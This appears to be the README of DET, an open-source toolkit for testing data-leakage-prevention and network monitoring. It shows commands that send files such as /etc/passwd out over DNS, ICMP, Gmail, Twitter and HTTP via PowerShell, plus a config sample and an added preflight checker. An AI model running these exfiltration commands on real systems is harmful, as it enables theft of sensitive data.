(extensible) Data Exfiltration Toolkit (DET)
Latest commit 417cbce Nov 3, 2017



DET (extensible) Data Exfiltration Toolkit

DET (provided AS IS) is a proof of concept for performing data exfiltration using either a single channel or multiple channels at the same time.

This is a Proof of Concept aimed at identifying possible DLP failures. This should never be used to exfiltrate sensitive/live data (say on an assessment).

The idea was to create a generic toolkit into which any kind of protocol/service can be plugged, in order to test the configuration of implemented Network Monitoring and Data Leakage Prevention (DLP) solutions against different data exfiltration techniques.

The primary repository has now moved to here.


DET was presented at BSides Ljubljana on the 9th of March 2016. Slides are available here.

Example usage (ICMP plugin)





Usage while combining two channels (Gmail/Twitter)






Clone the repo:

git clone


pip install -r requirements.txt --user


In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called: config-sample.json

{
    "plugins": {
        "http": {
            "target": "",
            "port": 8080
        },
        "google_docs": {
            "target": "",
            "port": 8080
        },
        "dns": {
            "key": "",
            "target": "",
            "port": 53
        },
        "gmail": {
            "username": "",
            "password": "ReallyStrongPassword",
            "server": "",
            "port": 587
        },
        "tcp": {
            "target": "",
            "port": 6969
        },
        "udp": {
            "target": "",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "ACCESS_TOKEN": "XXXXXXXXX"
        },
        "icmp": {
            "target": ""
        }
    },
    "sleep_time": 10
}


Help usage

python -h
usage: [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode


To load every plugin in server mode (-L):

python -L -c ./config.json

To load only twitter and gmail modules:

python -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python -L -c ./config.json -e dns


To load every plugin when sending a file (-f):

python -c ./config.json -f /etc/passwd

To load only twitter and gmail modules:

python -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python -c ./config.json -e dns -f /etc/passwd

And in PowerShell (HTTP module):

PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
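
The check below is an added example, not part of DET: it loads a configuration in the shape of config-sample.json, applies the -p/-e selection, and lists the selected plugins whose settings are empty or invalid, so that a channel which never ran is not read as a monitoring pass. The function names, the sample values and the exact -p/-e semantics (include first, then exclude) are assumptions.

```python
import json

# Constructed sample in the shape of config-sample.json (all values are made up).
SAMPLE_CONFIG = json.loads("""
{
    "plugins": {
        "http":  {"target": "192.0.2.10", "port": 8080},
        "dns":   {"key": "", "target": "192.0.2.10", "port": 53},
        "gmail": {"username": "", "password": "ReallyStrongPassword",
                  "server": "", "port": 587},
        "icmp":  {"target": ""}
    },
    "sleep_time": 10
}
""")

SECRET_KEYS = {"password", "ACCESS_TOKEN"}  # secret-bearing keys seen in the sample config


def select_plugins(config, include=None, exclude=None):
    """Assumption inferred from the help text: -p keeps only the named plugins, -e drops them."""
    names = list(config.get("plugins", {}))
    if include:
        unknown = sorted(set(include) - set(names))
        if unknown:
            raise ValueError("not in config: " + ", ".join(unknown))
        names = [n for n in names if n in include]
    return [n for n in names if n not in set(exclude or [])]


def preflight(config, include=None, exclude=None):
    """Return (plugin, finding) pairs for selected channels that would not give a valid test."""
    findings = []
    for name in select_plugins(config, include, exclude):
        for key, value in config["plugins"][name].items():
            if key in SECRET_KEYS and value:
                findings.append((name, f"cleartext secret in '{key}'"))
            elif key == "port" and not (isinstance(value, int) and 0 < value < 65536):
                findings.append((name, f"invalid port {value!r}"))
            elif value == "":
                findings.append((name, f"empty '{key}'"))
    return findings


if __name__ == "__main__":
    for plugin, finding in preflight(SAMPLE_CONFIG, exclude=["icmp"]):
        print(f"{plugin}: {finding}")
```

A "cleartext secret" finding means the configuration file holds a credential and should be readable only by the account running the test.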


So far, DET supports multiple protocols, listed here:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other "services":

  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

Experimental modules

So far, I am busy implementing new modules which are almost ready to ship, including:

  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)



Some pretty cool references/credits to people I got inspired by with their project:


You can reach me on Twitter @PaulWebSec. Feel free if you want to contribute, clone, fork, submit your PR and so on.


DET is licensed under a MIT License. Permissions beyond the scope of this license may be available at
